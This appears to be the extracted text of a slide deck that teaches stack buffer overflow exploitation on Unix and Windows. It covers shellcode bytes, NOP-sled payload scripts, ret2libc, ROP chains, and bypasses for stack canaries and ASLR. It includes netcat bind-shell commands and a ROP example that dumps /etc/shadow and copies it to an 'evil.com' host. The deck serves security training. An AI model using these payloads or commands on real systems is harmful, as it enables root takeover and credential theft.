Unix executable buffer overflow

UNIX EXECUTABLE
EXPLOITATION
Ammarit Thongthua
<ShellCodeNoobx Es>

#whoami
<Name>
Ammarit Thongthua
Mr. K
ShellCodeNoob
</Name>
<Profile>
PentestTeam leader in private company
</Profile>
FB : Ammarit Es Shellcodenoob

“There are some relationships between
- Reverse Engineering
- Buffer overflow
- Shellcode
They are the complement of each other”
“Sleepy Kama”
#Inspiration

AGENDA
 Introduction
 Vulnerable Unix executable
 Memory Space and Stack Layout
 Buffer Overflow
 Unix application Basic Reverse Engineer
 ShellCode
 Protection vs Expliotation
 Basic Stack without protection
 Bypass password protection
 Exploitto get root privilege
 Limited Stack Space
 StackGuard (Canary)
 Non-Executable-Stack (NX)
 ROP Chain
 Address Space Layout Randomization (ASLR)
 Defeat with static system library (kernel < 2.6.20 )
 ASLR with removed Static system library
 Defeat with application wrapping (kernel >= 2.6.20 )
 Compare with windows exploitation

Chapter I
“Vulnerable Unix Application”

VULNERABLE UNIX APPLICATION
 Has permission “root” as user or group
 SUID or SGID is set (Sting S at eXecute bit)
 This 2 criteria provided privilege escalation to be root
 list="$(find / -perm -4000 -o -perm -2000)";for i in
$list; do ls -al $i; done
 ls –R / | grep “wsr” | grep “root”

VULNERABLE UNIX APPLICATION
 Use vulnerable input standard function
 Ex: strcp(), gets(), sprintf (), vsprintf ()
 They make the program can possibly segmentation
fault or buffer overflow

Chapter II
“Memory Address and Stack Layout”

MEMORY ADDRESS AND STACK LAYOUT
0xFFFFFFFF
0x00000000
Code Segment
Data Segment
DSS Segment
Heap
Stack

main ()
{
int i = 0;
checkpw ();
}
char pw[608];

0xFFFFFFFF
0x00000000
Stack
Int i = 0;
…..
Previous Stacks
Main()
ESP

main ()
{
int I = 0;
checkpw ();
}
char pw[608];

main ()
{
int I = 0;
checkpw ();
}
char pw[608];
RP

0xFFFFFFFF
0x00000000
Char pw[608];
Int i = 0;
…..
Previous Stacks
Main()
checkpw()
SFP
RP
Stack
ESP

Chapter III
“Stack buffer overflow”

BUFFER OVERFLOW
 The situation when the data that input to the
system is larger than the size of buffer that
declare to be used
AAAAAAAAAA....[607 of A]….AAAx00 SFP RP
AAAAAAAAAA….[616 of A]….AAAAAAAAAAAAAAx00
SFP = 0x41414141
***RP = 0x41414141
“Segmentation fault”
“Illegal Instruction”
SFP RP
Ex: char pw[608];

“How can we detect
buffer overflow in unix application?”

“Generally, we use manually test”

“Better way, we use pattern test”

BUFFER OVERFLOW
/usr/share/metasploit-framework/tools/pattern_create.rb 1000
 Check buffer overflow position

 Check buffer overflow position
/usr/share/metasploit-framework/tools/pattern_offset.rb 41347541
BUFFER OVERFLOW

“What happen
if we can over write Return Pointer?”
“Can we control flow of instruction?”

BUFFER OVERFLOW
AAAAAAAAAAAAA….[612 of A]….AAAAAAA
SFP = 0x41414141
***RP = 0x080484c7
SFP RP
0x080484c7

BUFFER OVERFLOW
Demo #1
GDB and Bypass password
protection

Chapter IV
“Basic Shellcode”

“Imagine if we can control Return Pointer to
our own Instruction”
“So, we can control the whole system”

SHELL CODE
[Malicious Machine OpCode] + AAAAAAAAAAAAAAA
SFP = 0x41414141
***RP = 0xFBFF0544
0xFBFF0544
0xFBFF0544
SFP RP
 Attacker can control return pointer to run Malicious
Machine OpCode that put to memory (Shell Code).
 Insert shell code as a part of input to reduce the
complexity of exploitation

SHELL CODE
 Shell code is the code that attacker want the
system run in order to operate the command as
attacker need (create form assembly and convert
to OpCode
 Ex;
 Open port for connection to that system with root privilege
 Add user to the system
 Run shell as root privilege
 Shell code is written as Hexadecimal format

“What happen if we can make Return Pointer
system_call /bin/sh
by programrun as root ?”

“We will get shell prompt with root pri.”

SHELL CODE
31 C0
50
68 2F 2F 73
68 68 2F 62
69 6E
89
E3
50 53 89
E1 B0 0B
CD 80
Assembly Code Op Code
Shell Code
: system_call (/bin/sh)
/bin
0000
//sh
0000
$esp

SHELL CODE
System_call(/bin/sh)Run as “root”
Vulnerability program
We get /bin/sh as root 
RP

“How can we get shellcode ?”

 Where can we get shell code use to make exploit. ?
 Create your own shell code (quite take time)
 Use Metasploit to generate shell code
 Metepreter
 Search from internet
 shell-storm.org/shellcode
 packetstormsecurity.com
 www.exploit-db.com/exploits
SHELL CODE

“How can we manually create shellcode ?”

“Good news, you need to understand
Assemble first !!”

https://defuse.ca/online-x86-assembler.htm#disassembly
SHELL CODE

“How can we know what is shellcode do ?”

“Good news again, you need to understand
Assemble first !!”

http://www2.onlinedisassembler.com/odaweb/
SHELL CODE

“Can you see something difference between
Assembly from debugger and output from
the webs?”

ASSEMBLY CODE
From our debugger From our web disassembly

Nothing wrong..
It’s just different instruction set

ASSEMBLY CODE
From our debugger From our web disassembly
AT&T base instruction Intel base instruction

Chapter V
“Make exploit payload”

EXPLOIT PAYLOAD
[Shell Code] + [PADDING make size to 612 ]
SFP = 0x41414141
***RP = 0xBFFF528
0xBFFF528
SFP RP
Payload = Shellcode + PAD + RP
612 bytes 4 bytes
0xBFFF528
Example:

 Where is the shell code start location (For this
example case)?
 Need to reverse engineering and debug
EXPLOIT PAYLOAD

Shellcode = “x31xc0x50x68x2fx2fx73x68x68x2fx62x69"
"x6ex89xe3x50x53x89xe1xb0x0bxcdx80”
RP = “x20xf5xffxbf” #0xBFFF520 (Little Endean!!!)
PAYLOAD = scode + “A”*528 + RP
print PAYLOAD
-----------------------------------------------------------------------------------------------
user@host:$ python exp.py | ./vul_app
EXPLOIT PAYLOAD

EXPLOIT PAYLOAD
 Sometime result of our exploit is crash !!!

“What’s wrong in our PAYLOAD ^^? ”

EXPLOIT PAYLOAD
 Memory on address when debug and run exploit
payload may a bit shift
[Shell Code] + [PADDING make size to 612 ] 0xBFFF528

“How can we solve this problem ?”

[ Shell Code ] + [ 577 Byte of PADDING ] 0xBFFF528
EXPLOIT PAYLOAD
[400B. Landing space]+[Shell Code]+ [177 B. PADDING ]0xBFFF540
NOP (x90) = Do nothing

RP = “x58xf5xffxbf” # 0xBFFF558
Exp = “x90”*400 + scode + “A”*128 + RP
-----------------------------------------------------------------------------------------------
EXPLOIT PAYLOAD

“Let’s try our improved payload”

EXPLOIT CODE
 When exploit successfully

EXPLOIT CODE
Demo #2
Exploit to get root privilege

Chapter VI
“Buffer overflow in limited stack space”

LIMITED STACK SPACE
x31x57xdfx45x98xcex55xedx78xedxedx57x76x23x12x6fxf3x6ex4a
SFP = 0x12237657
***RP = 0x4a6ef36f
SFP RP
Payload =x31x57xdfx45x98xcex55xedx78xedxedx57x76x23x12x6fxf3x6ex4a

“How can we solve this problem”

LIMITED STACK SPACE
[ NOP Space (NOP Sledding)] + [S h e l l C o d e ]
AAAAAAAAAAAAA…[612 of A]…AAAAAAAA
SFP = 0x41414141
***RP = 0xBFFFxxxx ??? (We don’t know yet)
0xFBFFxxxx
0xFBFFxxxx
SFP RP
 If size of buffer is limited, we need to put some
shell code some where in stack and control RP to
run shell code

LIMITED STACK SPACE
***RP = 0xBFFFF7B0

RP = “xb0xf7xffxbf” # 0xBFFF520
Exp =`python c- ‘print “A”*612` + RP + =`python c- ‘print “x90”*400` + scode
-----------------------------------------------------------------------------------------------
LIMITED STACK SPACE

LIMITED STACK SPACE

Demo #3
With Limited Stack Space
LIMITED STACK SPACE

SUMMARY
Grant()main()AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP
x90x90x90 x90x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP
x90 x90x90x90x90x90x90 + [Shell Code]AAAAAAAAAAAAAAAAAAAAAAAAAAA RP AAAAA
 Bypass password protection
 Buffer overflow to run shellcode to get root privilege
 Buffer overflow to run shellcode with limited Stack Space

“Is it easy like this in real life?”

 Characteristic of vulnerable program
 Has set SUID, GUID
 Can Overflow
 Use Libc.
BYPASS LIMITED STACK SPACE BY RET-2-LIBC

“What happen if we jump RP and run?”
system_call nc –l –p 9999 –e /bin/sh

 Fool program to make system call with evil
command
 System_call nc -l -p 9999 -e /bin/sh
AAAAAAAAAAAAA
If Arg = “nc -l -p 9999 -e /bin/sh” and Program run as “root”
So, “nc –l –p 9999 –e /bin/sh” run as “root”
SFP
RP Argsystem

 Find location of “system” call function

 Create “evil” Argument as system global variable
AAAAAAAAAAAAA
SFP RP =
Argsystem
xf0x4execxb7 x98xfaxffxbfNC =

 Result

Demo #4
with Ret-2-libc style

Chapter VIII
“ROP Chaining”

 The limitation of Ret-2-Libc is run only 1
command a time to exploit
AAAAAAAAAAAAA
SFP RP =
Argsystem
ROP CHAIN

“It’s better if we can run more than one
commandin one exploit”

“Let improve Ret-2-Libc to ROP Chaining”

AAAAAAAAAAAAA
SFP RP =
Arg1system
ROP CHAIN
RP

AAAAAAAAAAAAA Arg1system
ROP CHAIN
RP

Arg1system
ROP CHAIN
RP Arg2system

ROP CHAIN
Arg1system system Arg2RP

ROP CHAIN
Arg1system system Arg2RP system Arg3RP

ROP CHAIN
Arg1system system Arg2 system Arg3
Argn-2system system Argn-1 system Argn

export ARG1=“unshadow /etc/passwd /etc/shadow > /output.txt”
export ARG2=“scp haker@evil.com:output.txt /home/haker”
.
.
.
.
export ARGn=“nc –l –p 4444 –e /bin/sh”
ROP CHAIN

“We need POP POP RET”
ROP Gadget

Arg1system
ROP CHAIN
RP Arg2system
POP
POP
RET

ROP CHAIN
POP POP RET
Arg1system RP Arg2system

ROP CHAIN
POP
POP
RET
xc5x85x48x80
Arg1system RP Arg2system

ROP CHAIN
Arg1system system Arg2 system Arg3
Argn-2system system Argn-1 system Argn
RP = xc5x85x48x80 (POP|POP|RET)
RP RP RP
RP RP

ROP CHAIN
python -c 'print "A"*12 +
"x[syscall.addr.]" + "x[P/P/R addr.]" + "x[addr.arg1]" + "PADS" +
"x[syscall.addr.]" + "x[P/P/R addr.]" + "x[addr.arg2]“ + "PADS" +
.
.
.
"x[syscall.addr.]" + "x[P/P/R addr.]" + "x[addr.argN]“ + "PADS" +

Chapter IIX
“Stack Guard (Canary)”
Cookie of death

STACK GUARD (CANARY)
 Protection mechanism place in stack (8 byte) to detect
the overflow and preventing to control RP
 Need to include when we compile program
 gcc -fstack-protector code.c -o myprogram
 If canary overwritten the program will be terminated
 Type of Canary
 NULL canary (0x00000000)
 Terminator canary (0x00000aff – 0x000aff0d)
 Random canary (Unpredicted 4 byte)
AAAAAAAAAAAAAAAAAAAA AAAA AAAA AAAA
SFP RPCanary

 For Null canary and Terminator canary can be
defeated by “Canary repaired”
 NULL canary only app use gets() function
AAA…AAA00000000AAAA[RP]x90x90x90x[Shellcode]x0a
 Terminator canary (always 0x00000aff)
 app use gets() function
 app use strcpy() function and need more than 1 arg
AAA…AAAAAAA0affAAAA[RP]x90x90x90x[Shellcode]00
BBB…BBBBB00
CCC…CCC00
AAA…AAA00000affAAAA[RP]x90x90x90x[Shellcode]
STACK GUARD (CANARY) DEFEAT
Arg1=
Arg2=
Arg3=

STACK GUARD (CANARY) DEFEAT EXAMPLE
 Find opportunity to exploit

 Find opportunity to exploit
Canary value = 0x00000aff
(It is a terminator canary ^_^)

 Run exploit

Demo #5
with canary repaired
STACK GUARD (CANARY) DEFEAT

ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR)
 Technique use prevent an attacker jumping to a
particular exploited code in memory by random
the virtual address in every runtime.

(ASLR)
x90x90x90 x90x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAA RP…….
Random is 2 So, Possibility =1/2 or 0.000001
20 20
How can we increase possibility to jump to shell code ?

(ASLR) DEFEAT METHOD
AAAAAAAAAAAAAAAAAAAAAAA RP /x90/x90/x90/x[ shell code ]…….
JMP ESP
esp
 If OS kernel has some static lib kernel < 2.6.20.
Use JMP ESP (Trampoline) instruction in that
static lib to bring RP to shell code
INC EAX ADD EBS, EBP ….

 If OS kernel has not static lib (kernel >= 2.6.20 ),
need to write application to call vulnerable
application to limit random address space (App wrap
up)
AAAAAAAAAAAAAAAAAAAAAAAAA
RP /x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x[ shell code ]
Check current ESP value
and Set
RP = ESP + [vul app buffer]

 Wrap up app

 Result

Chapter X
“Compare Windows & unix exploit”

DIFFERENCE OF UNIX AND WINDOWS
APPLICATION EXPLOIT
 Unix application directly communicate to kernel
 Window application must communicate through
Window API (Not directly communicate to
kernel) . It’s make more difficult to exploit
App Kernel
App KernelAPI

WINDOW SHELLCODE
 Static Shellcode (Example for window XP)
 Static or fix memory address of windows API that use
in exploit code (Specific OS version and SP)
 Find address of WinExec() > use to execute cmd / app
 Find address of ExitProcess() > use to clear register
 Portable Shellcode
 Dynamically find memory address of need window
API by using 2 useful windows API
 LoadLibraryA() to get Hmodule (DLL's base address )
 GetProcessAddress() to get real address of function
 Get address of WinExec()
 Get address of ExitProcess()

 Normally, virus use LoadLibraryA() and
GetProcessAddress() to make portable expliot
WINDOW SHELLCODE

WINDOW SHELLCODE

WINDOW SHELLCODE
xebx1bx5bx31xc0x50x31xc0x88x43x59x53xbbx4dx11x86x7c
xffxd3x31xc0x50xbbxa2xcax81x7cxffxd3xe8xe0xffxffxffx63
x61x6cx63x2ex65x78x65

BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION

 Found the vulnerability of application
WINDOWS APPLICATION

 Input to the system is larger than the size of
buffer that declare to be used
AAAABBBBCCCC.....KKKKLLLLMMMM SFP RP
char local[49];
WINDOWS APPLICATION
AAAABBBBCCCC.....KKKKLLLLMMMM NNNN OOOOPPPP
ESP

 Find address to jump to exploit code
WINDOWS APPLICATION
x90x90x90x90…[shellcode]…AAAAAAAA RP
* RP = “x40xffx13

 Exploit Successful
WINDOWS APPLICATION
Successfully exploit.
But calc.exe run as
your permission
not “Administrator”

 Imagine, if some windows application provide
network service like FTP that start by
“SYSTEM” account and have buffer overflow
vulnerability (Ex: WarFTP app)
WINDOWS APPLICATION

WINDOWS APPLICATION
FTP 192.168.1.2
USER AAAAAA….AAAA $JMP_ESP x90x90x90x90 SYSCODE
RP
ESP

 After connect back to open port, user/password
to the system to confirm that we successfully get
system privilege
WINDOWS APPLICATION

 Rule of permission gaining in Windows exploit
 If we exploit the application, we will get the
permission as who start or run the application
 If application or service start or run by
“Administrator” or “SYSTEM” account, we will gain
“Administrator” or “SYSTEM” privilege
 All windows vulnerability that attacker use to
compromise OS occurred form successfully exploit
“SYSTEM” service
BASIC WINDOWS EXPLOITATION

 DLL injection exploitation
 SafeSeh (Structured Exception Handling) and Abuse
 Windows ASLR and how to defeat
 Windows DEP and how to defeat
 GS protection in Windows application and how to defeat
 Advance pivoting attack technique
 HEAP overflow / Heap Spray / Use After free
“Unfortunately, We have not enough time to walk through”
MORE INTERESTING TOPIC FOR WINDOWS

 CoreLAN team : https://www.corelan.be
 NetSEC : http://netsec.ws/?p=180
 http://www.cis.syr.edu/~wedu/education/buffer_ov
erflow.html
LEARNING SITE

REFERENCE
 SANS 660 Advanced Penetration Testing, Exploit
Writing, and Ethical Hacking
 GIAC GXPN : Exploit Researcher and Advanced
Penetration Tester
 Protecting Against Address Space Layou
Randomization (ASLR) Compromises and Return-to-
Libc Attacks Using Network Intrusion Detection
Systems. David J. Day, Zheng-Xu Zhao, November
2011, Volume 8, Issue 4, pp 472-483
 Cowan, C. Buffer Overflow Attacks.
StackGuard:Automatic Adaptive Detection and
Prevention of Buffer-Overflow Attacks. 1 October
2008.
 Defeating PaX ASLR protection. Durden, T. 59, s.l.
:Phrack, 2002, Vol. 12.

Unix executable buffer overflow

Recommended

More Related Content

Viewers also liked (20)

Similar to Unix executable buffer overflow (20)

Recently uploaded (20)

Unix executable buffer overflow